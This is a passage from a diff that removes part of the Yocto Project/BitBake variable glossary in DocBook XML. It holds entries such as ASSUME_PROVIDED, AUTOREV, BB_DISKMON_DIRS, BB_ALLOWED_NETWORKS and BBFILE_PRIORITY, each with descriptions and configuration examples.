-     ARCHIVER_MODE[srpm] = "1"                       # Uses RPM package files.
-                    </literallayout>
-                    For information on how the variable works, see the
-                    <filename>meta/classes/archiver.bbclass</filename> file
-                    in the
-                    <link linkend='source-directory'>Source Directory</link>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-AS'><glossterm>AS</glossterm>
-            <info>
-                AS[doc] = "Minimal command and arguments to run the assembler."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Minimal command and arguments needed to run the
-                    assembler.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ASSUME_PROVIDED'><glossterm>ASSUME_PROVIDED</glossterm>
-            <info>
-                ASSUME_PROVIDED[doc] = "Lists recipe names (PN values) BitBake does not attempt to build."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Lists recipe names
-                    (<link linkend='var-PN'><filename>PN</filename></link>
-                    values) BitBake does not attempt to build.
-                    Instead, BitBake assumes these recipes have already been
-                    built.
-                </para>
-
-                <para>
-                    In OpenEmbedded-Core, <filename>ASSUME_PROVIDED</filename>
-                    mostly specifies native tools that should not be built.
-                    An example is <filename>git-native</filename>, which when
-                    specified, allows for the Git binary from the host to be
-                    used rather than building <filename>git-native</filename>.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-ASSUME_SHLIBS'><glossterm>ASSUME_SHLIBS</glossterm>
-            <info>
-                ASSUME_SHLIBS[doc] = "Provides additional shlibs provider mapping information, which adds to or overwrites the information provided automatically by the system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Provides additional <filename>shlibs</filename> provider
-                    mapping information, which adds to or overwrites the
-                    information provided automatically by the system.
-                    Separate multiple entries using spaces.
-                </para>
-
-                <para>
-                    As an example, use the following form to add an
-                    <filename>shlib</filename> provider of
-                    <replaceable>shlibname</replaceable> in
-                    <replaceable>packagename</replaceable> with the optional
-                    <replaceable>version</replaceable>:
-                    <literallayout class='monospaced'>
-     <replaceable>shlibname:packagename</replaceable>[_<replaceable>version</replaceable>]
-                    </literallayout>
-                </para>
-
-                <para>
-                    Here is an example that adds a shared library named
-                    <filename>libEGL.so.1</filename> as being provided by
-                    the <filename>libegl-implementation</filename> package:
-                    <literallayout class='monospaced'>
-     ASSUME_SHLIBS = "libEGL.so.1:libegl-implementation"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-AUTHOR'><glossterm>AUTHOR</glossterm>
-            <info>
-                AUTHOR[doc] = "Email address used to contact the original author or authors in order to send patches and forward bugs."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The email address used to contact the original author
-                    or authors in order to send patches and forward bugs.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-AUTO_LIBNAME_PKGS'><glossterm>AUTO_LIBNAME_PKGS</glossterm>
-            <info>
-                AUTO_LIBNAME_PKGS[doc] = "Specifies which packages should be checked for libraries and renamed according to Debian library package naming."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When the
-                    <link linkend='ref-classes-debian'><filename>debian</filename></link>
-                    class is inherited, which is the default behavior,
-                    <filename>AUTO_LIBNAME_PKGS</filename> specifies which
-                    packages should be checked for libraries and renamed
-                    according to Debian library package naming.
-                </para>
-
-                <para>
-                    The default value is "${PACKAGES}", which causes the
-                    debian class to act on all packages that are
-                    explicitly generated by the recipe.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-AUTO_SYSLINUXMENU'><glossterm>AUTO_SYSLINUXMENU</glossterm>
-            <info>
-                AUTO_SYSLINUXMENU[doc] = "Enables creating an automatic menu for the syslinux bootloader."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Enables creating an automatic menu for the syslinux
-                    bootloader.
-                    You must set this variable in your recipe.
-                    The
-                    <link linkend='ref-classes-syslinux'><filename>syslinux</filename></link>
-                    class checks this variable.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-AUTOREV'><glossterm>AUTOREV</glossterm>
-            <info>
-                AUTOREV[doc] = "When SRCREV is set to the value of this variable, it specifies to use the latest source revision in the repository."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    When
-                    <filename><link linkend='var-SRCREV'>SRCREV</link></filename>
-                    is set to the value of this variable, it specifies to use
-                    the latest source revision in the repository.
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     SRCREV = "${AUTOREV}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    If you use the previous statement to retrieve the latest
-                    version of software, you need to be sure
-                    <link linkend='var-PV'><filename>PV</filename></link>
-                    contains
-                    <filename>${</filename><link linkend='var-SRCPV'><filename>SRCPV</filename></link><filename>}</filename>.
-                    For example, suppose you have a kernel recipe that
-                    inherits the
-                    <link linkend='ref-classes-kernel'>kernel</link> class
-                    and you use the previous statement.
-                    In this example, <filename>${SRCPV}</filename> does not
-                    automatically get into <filename>PV</filename>.
-                    Consequently, you need to change <filename>PV</filename>
-                    in your recipe so that it does contain
-                    <filename>${SRCPV}</filename>.
-                </para>
-
-                <para>
-                    For more information see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#automatically-incrementing-a-binary-package-revision-number'>Automatically Incrementing a Binary Package Revision Number</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                    </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-AVAILABLE_LICENSES'><glossterm>AVAILABLE_LICENSES</glossterm>
-            <info>
-                AVAILABLE_LICENSES[doc] = "List of licenses found in the directories specified by COMMON_LICENSE_DIR and LICENSE_PATH."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-
-                    List of licenses found in the directories specified
-                    by <link linkend='var-COMMON_LICENSE_DIR'><filename>COMMON_LICENSE_DIR</filename></link>
-                    and <link linkend='var-LICENSE_PATH'><filename>LICENSE_PATH</filename></link>.
-
-                    <note>
-                        It is assumed that all changes
-                        to <filename>COMMON_LICENSE_DIR</filename>
-                        and <filename>LICENSE_PATH</filename> have been done
-                        before <filename>AVAILABLE_LICENSES</filename> is
-                        defined
-                        (in <link linkend='ref-classes-license'>license.bbclass</link>).
-                    </note>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-AVAILTUNES'><glossterm>AVAILTUNES</glossterm>
-            <info>
-                AVAILTUNES[doc] = "The list of defined CPU and Application Binary Interface (ABI) tunings (i.e.  "tunes") available for use by the OpenEmbedded build system."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The list of defined CPU and Application Binary Interface
-                    (ABI) tunings (i.e.  "tunes") available for use by the
-                    OpenEmbedded build system.
-                </para>
-
-                <para>
-                    The list simply presents the tunes that are available.
-                    Not all tunes may be compatible with a particular
-                    machine configuration, or with each other in a
-                    <ulink url='&YOCTO_DOCS_DEV_URL;#combining-multiple-versions-library-files-into-one-image'>Multilib</ulink>
-                    configuration.
-                </para>
-
-                <para>
-                    To add a tune to the list, be sure to append it with
-                    spaces using the "+=" BitBake operator.
-                    Do not simply replace the list by using the "=" operator.
-                    See the
-                    "<ulink url='&YOCTO_DOCS_BB_URL;#basic-syntax'>Basic Syntax</ulink>"
-                    section in the BitBake User Manual for more information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-    </glossdiv>
-
-    <glossdiv id='var-glossary-b'><title>B</title>
-
-        <glossentry id='var-B'><glossterm>B</glossterm>
-            <info>
-                B[doc] = "The Build Directory. The OpenEmbedded build system places generated objects into the Build Directory during a recipe's build process."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The directory within the
-                    <link linkend='build-directory'>Build Directory</link>
-                    in which the OpenEmbedded build system places generated
-                    objects during a recipe's build process.
-                    By default, this directory is the same as the <link linkend='var-S'><filename>S</filename></link>
-                    directory, which is defined as:
-                    <literallayout class='monospaced'>
-     S = "${WORKDIR}/${BP}"
-                    </literallayout>
-                </para>
-
-                <para>
-                    You can separate the (<filename>S</filename>) directory
-                    and the directory pointed to by the <filename>B</filename>
-                    variable.
-                    Most Autotools-based recipes support separating these
-                    directories.
-                    The build system defaults to using separate directories for
-                    <filename>gcc</filename> and some kernel recipes.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BAD_RECOMMENDATIONS'><glossterm>BAD_RECOMMENDATIONS</glossterm>
-            <info>
-                BAD_RECOMMENDATIONS[doc] = "A list of packages not to install despite being recommended by a recipe. Support for this variable exists only when using the IPK packaging backend."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Lists "recommended-only" packages to not install.
-                    Recommended-only packages are packages installed only
-                    through the
-                    <link linkend='var-RRECOMMENDS'><filename>RRECOMMENDS</filename></link>
-                    variable.
-                    You can prevent any of these "recommended" packages from
-                    being installed by listing them with the
-                    <filename>BAD_RECOMMENDATIONS</filename> variable:
-                    <literallayout class='monospaced'>
-     BAD_RECOMMENDATIONS = "<replaceable>package_name</replaceable> <replaceable>package_name</replaceable> <replaceable>package_name</replaceable> ..."
-                    </literallayout>
-                </para>
-
-                <para>
-                    You can set this variable globally in your
-                    <filename>local.conf</filename> file or you can attach it to
-                    a specific image recipe by using the recipe name override:
-                    <literallayout class='monospaced'>
-     BAD_RECOMMENDATIONS_pn-<replaceable>target_image</replaceable> = "<replaceable>package_name</replaceable>"
-                    </literallayout>
-                </para>
-
-                <para>
-                    It is important to realize that if you choose to not install
-                    packages using this variable and some other packages are
-                    dependent on them (i.e. listed in a recipe's
-                    <link linkend='var-RDEPENDS'><filename>RDEPENDS</filename></link>
-                    variable), the OpenEmbedded build system ignores your
-                    request and will install the packages to avoid dependency
-                    errors.
-                </para>
-
-                <para>
-                    Support for this variable exists only when using the
-                    IPK and RPM packaging backend.
-                    Support does not exist for DEB.
-                </para>
-
-                <para>
-                    See the
-                    <link linkend='var-NO_RECOMMENDATIONS'><filename>NO_RECOMMENDATIONS</filename></link>
-                    and the
-                    <link linkend='var-PACKAGE_EXCLUDE'><filename>PACKAGE_EXCLUDE</filename></link>
-                    variables for related information.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BASE_LIB'><glossterm>BASE_LIB</glossterm>
-            <info>
-                BASE_LIB[doc] = "The library directory name for the CPU or Application Binary Interface (ABI) tune."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The library directory name for the CPU or Application
-                    Binary Interface (ABI) tune.
-                    The <filename>BASE_LIB</filename> applies only in the
-                    Multilib context.
-                    See the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#combining-multiple-versions-library-files-into-one-image'>Combining Multiple Versions of Library Files into One Image</ulink>"
-                    section in the Yocto Project Development Tasks Manual for
-                    information on Multilib.
-                </para>
-
-                <para>
-                    The <filename>BASE_LIB</filename> variable is defined in
-                    the machine include files in the
-                    <link linkend='source-directory'>Source Directory</link>.
-                    If Multilib is not being used, the value defaults to "lib".
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BASE_WORKDIR'><glossterm>BASE_WORKDIR</glossterm>
-            <info>
-                BASE_WORKDIR[doc] = "Points to the base of the work directory for all recipes."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Points to the base of the work directory for all recipes.
-                    The default value is "${TMPDIR}/work".
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BB_ALLOWED_NETWORKS'><glossterm>BB_ALLOWED_NETWORKS</glossterm>
-            <info>
-                BB_ALLOWED_NETWORKS[doc] = "A list of hosts that the fetcher is allowed to use to obtain the required source code."
-            </info>
-            <glossdef>
-                <para>
-                    Specifies a space-delimited list of hosts that the fetcher
-                    is allowed to use to obtain the required source code.
-                    Following are considerations surrounding this variable:
-                    <itemizedlist>
-                        <listitem><para>
-                            This host list is only used if
-                            <filename>BB_NO_NETWORK</filename> is either not
-                            set or set to "0".
-                            </para></listitem>
-                        <listitem><para>
-                            Limited support for wildcard matching against the
-                            beginning of host names exists.
-                            For example, the following setting matches
-                            <filename>git.gnu.org</filename>,
-                            <filename>ftp.gnu.org</filename>, and
-                            <filename>foo.git.gnu.org</filename>.
-                            <literallayout class='monospaced'>
-     BB_ALLOWED_NETWORKS = "*.gnu.org"
-                            </literallayout>
-                            <note><title>Important</title>
-                                <para>The use of the "<filename>*</filename>"
-                                character only works at the beginning of
-                                a host name and it must be isolated from
-                                the remainder of the host name.
-                                You cannot use the wildcard character in any
-                                other location of the name or combined with
-                                the front part of the name.</para>
-
-                                <para>For example,
-                                <filename>*.foo.bar</filename> is supported,
-                                while <filename>*aa.foo.bar</filename> is not.
-                                </para>
-                            </note>
-                            </para></listitem>
-                        <listitem><para>
-                            Mirrors not in the host list are skipped and
-                            logged in debug.
-                            </para></listitem>
-                        <listitem><para>
-                            Attempts to access networks not in the host list
-                            cause a failure.
-                            </para></listitem>
-                    </itemizedlist>
-                    Using <filename>BB_ALLOWED_NETWORKS</filename> in
-                    conjunction with
-                    <link linkend='var-PREMIRRORS'><filename>PREMIRRORS</filename></link>
-                    is very useful.
-                    Adding the host you want to use to
-                    <filename>PREMIRRORS</filename> results in the source code
-                    being fetched from an allowed location and avoids raising
-                    an error when a host that is not allowed is in a
-                    <link linkend='var-SRC_URI'><filename>SRC_URI</filename></link>
-                    statement.
-                    This is because the fetcher does not attempt to use the
-                    host listed in <filename>SRC_URI</filename> after a
-                    successful fetch from the
-                    <filename>PREMIRRORS</filename> occurs.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BB_DANGLINGAPPENDS_WARNONLY'><glossterm>BB_DANGLINGAPPENDS_WARNONLY</glossterm>
-            <info>
-                BB_DANGLINGAPPENDS_WARNONLY[doc] = "Defines how BitBake handles situations where an append file (.bbappend) has no corresponding recipe file (.bb)."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines how BitBake handles situations where an append
-                    file (<filename>.bbappend</filename>) has no
-                    corresponding recipe file (<filename>.bb</filename>).
-                    This condition often occurs when layers get out of sync
-                    (e.g. <filename>oe-core</filename> bumps a
-                    recipe version and the old recipe no longer exists and the
-                    other layer has not been updated to the new version
-                    of the recipe yet).
-                </para>
-
-                <para>
-                    The default fatal behavior is safest because it is
-                    the sane reaction given something is out of sync.
-                    It is important to realize when your changes are no longer
-                    being applied.
-                </para>
-
-                <para>
-                    You can change the default behavior by setting this
-                    variable to "1", "yes", or "true"
-                    in your <filename>local.conf</filename> file, which is
-                    located in the
-                    <link linkend='build-directory'>Build Directory</link>:
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     BB_DANGLINGAPPENDS_WARNONLY = "1"
-                    </literallayout>
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BB_DISKMON_DIRS'><glossterm>BB_DISKMON_DIRS</glossterm>
-            <info>
-                BB_DISKMON_DIRS[doc] = "Monitors disk space and available inodes during the build and allows you to control the build based on these parameters."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Monitors disk space and available inodes during the build
-                    and allows you to control the build based on these
-                    parameters.
-                </para>
-
-                <para>
-                    Disk space monitoring is disabled by default.
-                    To enable monitoring, add the <filename>BB_DISKMON_DIRS</filename>
-                    variable to your <filename>conf/local.conf</filename> file found in the
-                    <link linkend='build-directory'>Build Directory</link>.
-                    Use the following form:
-                    <literallayout class='monospaced'>
-     BB_DISKMON_DIRS = "<replaceable>action</replaceable>,<replaceable>dir</replaceable>,<replaceable>threshold</replaceable> [...]"
-
-     where:
-
-        <replaceable>action</replaceable> is:
-           ABORT:     Immediately abort the build when
-                      a threshold is broken.
-           STOPTASKS: Stop the build after the currently
-                      executing tasks have finished when
-                      a threshold is broken.
-           WARN:      Issue a warning but continue the
-                      build when a threshold is broken.
-                      Subsequent warnings are issued as
-                      defined by the BB_DISKMON_WARNINTERVAL
-                      variable, which must be defined in
-                      the conf/local.conf file.
-
-        <replaceable>dir</replaceable> is:
-           Any directory you choose. You can specify one or
-           more directories to monitor by separating the
-           groupings with a space.  If two directories are
-           on the same device, only the first directory
-           is monitored.
-
-        <replaceable>threshold</replaceable> is:
-           Either the minimum available disk space,
-           the minimum number of free inodes, or
-           both.  You must specify at least one.  To
-           omit one or the other, simply omit the value.
-           Specify the threshold using G, M, K for Gbytes,
-           Mbytes, and Kbytes, respectively. If you do
-           not specify G, M, or K, Kbytes is assumed by
-           default.  Do not use GB, MB, or KB.
-                    </literallayout>
-                </para>
-
-                <para>
-                    Here are some examples:
-                    <literallayout class='monospaced'>
-     BB_DISKMON_DIRS = "ABORT,${TMPDIR},1G,100K WARN,${SSTATE_DIR},1G,100K"
-     BB_DISKMON_DIRS = "STOPTASKS,${TMPDIR},1G"
-     BB_DISKMON_DIRS = "ABORT,${TMPDIR},,100K"
-                    </literallayout>
-                    The first example works only if you also provide
-                    the <link linkend='var-BB_DISKMON_WARNINTERVAL'><filename>BB_DISKMON_WARNINTERVAL</filename></link> variable
-                    in the <filename>conf/local.conf</filename>.
-                    This example causes the build system to immediately
-                    abort when either the disk space in <filename>${TMPDIR}</filename> drops
-                    below 1 Gbyte or the available free inodes drops below
-                    100 Kbytes.
-                    Because two directories are provided with the variable, the
-                    build system also issue a
-                    warning when the disk space in the
-                    <filename>${SSTATE_DIR}</filename> directory drops
-                    below 1 Gbyte or the number of free inodes drops
-                    below 100 Kbytes.
-                    Subsequent warnings are issued during intervals as
-                    defined by the <filename>BB_DISKMON_WARNINTERVAL</filename>
-                    variable.
-                </para>
-
-                <para>
-                    The second example stops the build after all currently
-                    executing tasks complete when the minimum disk space
-                    in the <filename>${<link linkend='var-TMPDIR'>TMPDIR</link>}</filename>
-                    directory drops below 1 Gbyte.
-                    No disk monitoring occurs for the free inodes in this case.
-                </para>
-
-                <para>
-                    The final example immediately aborts the build when the
-                    number of free inodes in the <filename>${TMPDIR}</filename> directory
-                    drops below 100 Kbytes.
-                    No disk space monitoring for the directory itself occurs
-                    in this case.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BB_DISKMON_WARNINTERVAL'><glossterm>BB_DISKMON_WARNINTERVAL</glossterm>
-            <info>
-                BB_DISKMON_WARNINTERVAL[doc] = "Defines the disk space and free inode warning intervals. To set these intervals, define the variable in the conf/local.conf file in the Build Directory."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Defines the disk space and free inode warning intervals.
-                    To set these intervals, define the variable in your
-                    <filename>conf/local.conf</filename> file in the
-                    <link linkend='build-directory'>Build Directory</link>.
-                </para>
-
-                <para>
-                    If you are going to use the
-                    <filename>BB_DISKMON_WARNINTERVAL</filename> variable, you must
-                    also use the
-                    <link linkend='var-BB_DISKMON_DIRS'><filename>BB_DISKMON_DIRS</filename></link> variable
-                    and define its action as "WARN".
-                    During the build, subsequent warnings are issued each time
-                    disk space or number of free inodes further reduces by
-                    the respective interval.
-                </para>
-
-                <para>
-                    If you do not provide a <filename>BB_DISKMON_WARNINTERVAL</filename>
-                    variable and you do use <filename>BB_DISKMON_DIRS</filename> with
-                    the "WARN" action, the disk monitoring interval defaults to
-                    the following:
-                    <literallayout class='monospaced'>
-     BB_DISKMON_WARNINTERVAL = "50M,5K"
-                    </literallayout>
-                </para>
-
-                <para>
-                    When specifying the variable in your configuration file,
-                    use the following form:
-                    <literallayout class='monospaced'>
-     BB_DISKMON_WARNINTERVAL = "<replaceable>disk_space_interval</replaceable>,<replaceable>disk_inode_interval</replaceable>"
-
-     where:
-
-        <replaceable>disk_space_interval</replaceable> is:
-           An interval of memory expressed in either
-           G, M, or K for Gbytes, Mbytes, or Kbytes,
-           respectively. You cannot use GB, MB, or KB.
-
-        <replaceable>disk_inode_interval</replaceable> is:
-           An interval of free inodes expressed in either
-           G, M, or K for Gbytes, Mbytes, or Kbytes,
-           respectively. You cannot use GB, MB, or KB.
-                    </literallayout>
-                </para>
-
-                <para>
-                    Here is an example:
-                    <literallayout class='monospaced'>
-     BB_DISKMON_DIRS = "WARN,${SSTATE_DIR},1G,100K"
-     BB_DISKMON_WARNINTERVAL = "50M,5K"
-                    </literallayout>
-                    These variables cause the OpenEmbedded build system to
-                    issue subsequent warnings each time the available
-                    disk space further reduces by 50 Mbytes or the number
-                    of free inodes further reduces by 5 Kbytes in the
-                    <filename>${SSTATE_DIR}</filename> directory.
-                    Subsequent warnings based on the interval occur each time
-                    a respective interval is reached beyond the initial warning
-                    (i.e. 1 Gbytes and 100 Kbytes).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BB_GENERATE_MIRROR_TARBALLS'><glossterm>BB_GENERATE_MIRROR_TARBALLS</glossterm>
-            <info>
-                BB_GENERATE_MIRROR_TARBALLS[doc] = "Causes tarballs of the source control repositories to be placed in the DL_DIR directory."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Causes tarballs of the source control repositories
-                    (e.g. Git repositories), including metadata, to be placed
-                    in the
-                    <link linkend='var-DL_DIR'><filename>DL_DIR</filename></link>
-                    directory.
-                </para>
-
-                <para>
-                    For performance reasons, creating and placing tarballs of
-                    these repositories is not the default action by the
-                    OpenEmbedded build system.
-                    <literallayout class='monospaced'>
-     BB_GENERATE_MIRROR_TARBALLS = "1"
-                    </literallayout>
-                    Set this variable in your <filename>local.conf</filename>
-                    file in the
-                    <link linkend='build-directory'>Build Directory</link>.
-                </para>
-
-                <para>
-                    Once you have the tarballs containing your source files,
-                    you can clean up your <filename>DL_DIR</filename>
-                    directory by deleting any Git or other source control
-                    work directories.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BB_NUMBER_THREADS'><glossterm>BB_NUMBER_THREADS</glossterm>
-            <info>
-                BB_NUMBER_THREADS[doc] = "The maximum number of tasks BitBake should run in parallel at any one time. This variable is automatically configured to be equal to the number of build system cores."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    The maximum number of tasks BitBake should run in parallel
-                    at any one time.
-                    The OpenEmbedded build system automatically configures
-                    this variable to be equal to the number of cores on the
-                    build system.
-                    For example, a system with a dual core processor that
-                    also uses hyper-threading causes the
-                    <filename>BB_NUMBER_THREADS</filename> variable to default
-                    to "4".
-                </para>
-
-                <para>
-                    For single socket systems (i.e. one CPU), you should not
-                    have to override this variable to gain optimal parallelism
-                    during builds.
-                    However, if you have very large systems that employ
-                    multiple physical CPUs, you might want to make sure the
-                    <filename>BB_NUMBER_THREADS</filename> variable is not
-                    set higher than "20".
-                </para>
-
-                <para>
-                    For more information on speeding up builds, see the
-                    "<ulink url='&YOCTO_DOCS_DEV_URL;#speeding-up-a-build'>Speeding Up a Build</ulink>"
-                    section in the Yocto Project Development Tasks Manual.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BB_SERVER_TIMEOUT'><glossterm>BB_SERVER_TIMEOUT</glossterm>
-            <info>
-                BB_SERVER_TIMEOUT [doc] = "Specifies the time (in seconds) after which to unload the BitBake server due to inactivity."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Specifies the time (in seconds) after which to unload the
-                    BitBake server due to inactivity.
-                    Set <filename>BB_SERVER_TIMEOUT</filename> to determine how
-                    long the BitBake server stays resident between invocations.
-                </para>
-
-                <para>
-                    For example, the following statement in your
-                    <filename>local.conf</filename> file instructs the server
-                    to be unloaded after 20 seconds of inactivity:
-                    <literallayout class='monospaced'>
-     BB_SERVER_TIMEOUT = "20"
-                    </literallayout>
-                    If you want the server to never be unloaded, set
-                    <filename>BB_SERVER_TIMEOUT</filename> to "-1".
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BBCLASSEXTEND'><glossterm>BBCLASSEXTEND</glossterm>
-            <info>
-                BBCLASSEXTEND[doc] = "Allows you to extend a recipe so that it builds variants of the software. Common variants for recipes are 'native', 'cross', 'nativesdk', and multilibs."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Allows you to extend a recipe so that it builds variants of the software.
-                    Common variants for recipes exist such as "natives" like <filename>quilt-native</filename>,
-                    which is a copy of Quilt built to run on the build system;
-                    "crosses" such as <filename>gcc-cross</filename>,
-                    which is a compiler built to run on the build machine but produces binaries
-                    that run on the target <link linkend='var-MACHINE'><filename>MACHINE</filename></link>;
-                    "nativesdk", which targets the SDK machine instead of <filename>MACHINE</filename>;
-                    and "mulitlibs" in the form "<filename>multilib:</filename><replaceable>multilib_name</replaceable>".
-                </para>
-
-                <para>
-                    To build a different variant of the recipe with a minimal amount of code, it usually
-                    is as simple as adding the following to your recipe:
-                    <literallayout class='monospaced'>
-     BBCLASSEXTEND =+ "native nativesdk"
-     BBCLASSEXTEND =+ "multilib:<replaceable>multilib_name</replaceable>"
-                    </literallayout>
-                    <note>
-                        <para>
-                        Internally, the <filename>BBCLASSEXTEND</filename>
-                        mechanism generates recipe variants by rewriting
-                        variable values and applying overrides such as
-                        <filename>_class-native</filename>.
-                        For example, to generate a native version of a recipe,
-                        a
-                        <link linkend='var-DEPENDS'><filename>DEPENDS</filename></link>
-                        on "foo" is rewritten to a <filename>DEPENDS</filename>
-                        on "foo-native".
-                        </para>
-
-                        <para>
-                        Even when using <filename>BBCLASSEXTEND</filename>, the
-                        recipe is only parsed once.
-                        Parsing once adds some limitations.
-                        For example, it is not possible to
-                        include a different file depending on the variant,
-                        since <filename>include</filename> statements are
-                        processed when the recipe is parsed.
-                        </para>
-                    </note>
-                </para>
-             </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BBFILE_COLLECTIONS'><glossterm>BBFILE_COLLECTIONS</glossterm>
-            <info>
-                BBFILE_COLLECTIONS[doc] = "Lists the names of configured layers. These names are used to find the other BBFILE_* variables."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Lists the names of configured layers.
-                    These names are used to find the other <filename>BBFILE_*</filename>
-                    variables.
-                    Typically, each layer will append its name to this variable in its
-                    <filename>conf/layer.conf</filename> file.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BBFILE_PATTERN'><glossterm>BBFILE_PATTERN</glossterm>
-            <info>
-                BBFILE_PATTERN[doc] = "Variable that expands to match files from BBFILES in a particular layer. This variable is used in the layer.conf file and must be suffixed with the name of a layer."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Variable that expands to match files from
-                    <link linkend='var-BBFILES'><filename>BBFILES</filename></link>
-                    in a particular layer.
-                    This variable is used in the <filename>conf/layer.conf</filename> file and must
-                    be suffixed with the name of the specific layer (e.g.
-                    <filename>BBFILE_PATTERN_emenlow</filename>).
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BBFILE_PRIORITY'><glossterm>BBFILE_PRIORITY</glossterm>
-            <info>
-                BBFILE_PRIORITY[doc] = "Assigns the priority for recipe files in each layer. Setting this variable allows you to prioritize a layer against other layers that contain the same recipe."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Assigns the priority for recipe files in each layer.
-                </para>
-
-                <para>
-                    This variable is useful in situations where the same recipe appears in
-                    more than one layer.
-                    Setting this variable allows you to prioritize a
-                    layer against other layers that contain the same recipe - effectively
-                    letting you control the precedence for the multiple layers.
-                    The precedence established through this variable stands regardless of a
-                    recipe's version
-                    (<link linkend='var-PV'><filename>PV</filename></link> variable).
-                    For example, a layer that has a recipe with a higher <filename>PV</filename> value but for
-                    which the <filename>BBFILE_PRIORITY</filename> is set to have a lower precedence still has a
-                    lower precedence.
-                </para>
-
-                <para>
-                    A larger value for the <filename>BBFILE_PRIORITY</filename> variable results in a higher
-                    precedence.
-                    For example, the value 6 has a higher precedence than the value 5.
-                    If not specified, the <filename>BBFILE_PRIORITY</filename> variable is set based on layer
-                    dependencies (see the
-                    <filename><link linkend='var-LAYERDEPENDS'>LAYERDEPENDS</link></filename> variable for
-                    more information.
-                    The default priority, if unspecified
-                    for a layer with no dependencies, is the lowest defined priority + 1
-                    (or 1 if no priorities are defined).
-                </para>
-                <tip>
-                    You can use the command <filename>bitbake-layers show-layers</filename> to list
-                    all configured layers along with their priorities.
-                </tip>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BBFILES'><glossterm>BBFILES</glossterm>
-            <info>
-                BBFILES[doc] = "A space-separated list of recipe files BitBake uses to build software."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    A space-separated list of recipe files BitBake uses to
-                    build software.
-                </para>
-
-                <para>
-                    When specifying recipe files, you can pattern match using
-                    Python's
-                    <ulink url='https://docs.python.org/3/library/glob.html'><filename>glob</filename></ulink>
-                    syntax.
-                    For details on the syntax, see the documentation by
-                    following the previous link.
-                </para>
-            </glossdef>
-        </glossentry>
-
-        <glossentry id='var-BBFILES_DYNAMIC'><glossterm>BBFILES_DYNAMIC</glossterm>
-            <info>
-                BBFILES_DYNAMIC[doc] = "Activates content when identified layers are present."
-            </info>
-            <glossdef>
-                <para role="glossdeffirst">
-                    Activates content when identified layers are present.
-                    You identify the layers by the collections that the layers
-                    define.
-                </para>
-
-                <para>
-                    Use the <filename>BBFILES_DYNAMIC</filename> variable to
-                    avoid <filename>.bbappend</filename> files whose
-                    corresponding <filename>.bb</filename> file is in a layer
-                    that attempts to modify other layers through
-                    <filename>.bbappend</filename> but does not want to
-                    introduce a hard dependency on those other layers.
-                </para>
-
-                <para>
-                    Use the following form for
-                    <filename>BBFILES_DYNAMIC</filename>:
-                    <literallayout class='monospaced'>
-     <replaceable>collection_name</replaceable>:<replaceable>filename_pattern</replaceable>
-                    </literallayout>
-                    The following example identifies two collection names and
-                    two filename patterns:
-                    <literallayout class='monospaced'>
-     BBFILES_DYNAMIC += " \
-         clang-layer:${LAYERDIR}/bbappends/meta-clang/*/*/*.bbappend \
-         core:${LAYERDIR}/bbappends/openembedded-core/meta/*/*/*.bbappend \
-     "
-                    </literallayout>
-                    This next example shows an error message that occurs
